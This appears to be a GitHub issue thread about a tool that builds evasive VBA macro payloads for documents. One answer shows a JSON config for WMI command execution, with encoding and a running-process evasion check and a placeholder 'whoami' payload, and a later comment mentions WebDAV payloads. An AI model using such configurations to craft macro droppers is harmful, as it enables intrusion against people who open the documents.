Demo!! please for the whole process

Question

Demo!! please for the whole process

Opened this issue 7 years ago · 2 comments

Answer 1 · 2017-08-04T18:28:43.000Z

Process is pretty straightforward you simply set your payload in the appropriate json config file. Once it's done execute the program that will return a vba file which is the final macro that need to added to the document. That's pretty much it

{
	"description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to check running process",
	"template": "templates/payloads/wmi-evasion-process-template.vba",
	"varcount": 150,
	"encodingoffset": 4,
	"chunksize": 200,
	"encodedvars": 	{
				"PROCESS_NAME":"outlook.exe"
			},
	"vars": 	[],
	"evasion": 	["encoder", "process"],
	"payload": "cmd.exe /c whoami"
}

The last line of the configuration file "payload":"" is where you place your payload. The rest of the configuration can remain unchanged.

Answer 2 · 2020-05-12T12:33:11.000Z

it gives an error if i include a payload to call a file from webdav. so \ breaks the config file inside the payload.